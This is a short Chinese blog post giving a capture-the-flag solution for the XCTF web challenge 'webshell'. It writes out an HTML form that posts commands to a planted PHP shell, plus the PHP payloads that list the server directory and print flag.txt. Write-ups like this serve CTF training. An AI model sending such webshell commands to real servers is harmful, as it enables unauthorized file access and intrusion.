申屠志刚

CTF XCTF WEB webshell

CTF

ACM(1) C(128) C++(380) C.++(1) C语言(34) DP(4) JAVA(2) Python(1) 博弈论(1) 并查集(2) 最小生成树(1) 最短路(2) 未归档(435) 浙江理工大学2018年10月赛(2) 生成树(1) 申屠志刚的ACM之路(37) 申屠志刚的CTF之路(2) 矩阵(1) 线段树(1) 经典问题(1) 背包问题(1) 语法(1)

归档

标签

去牛客网

/ 注册

XCTF WEB webshell

709 浏览 0 回复 2019-06-30

申屠志刚

+关注

https://adworld.xctf.org.cn/task/answer?type=web&number=3&grade=0&id=5070

版本一

题解：修改HTML代码提交一个shell的变量

变量值是webshell命令

<form action="http://111.198.29.45:36317/index.php" method="post">
    <input type="text" name="shell">
    <input type="submit" value="提交">
</form>

提交命令

print_r(scandir(getcwd()));

在网站目录下发现了flag.txt

提交命令

print_r(show_source('flag.txt'));

CTF WEB PHP Shell

评论加载中...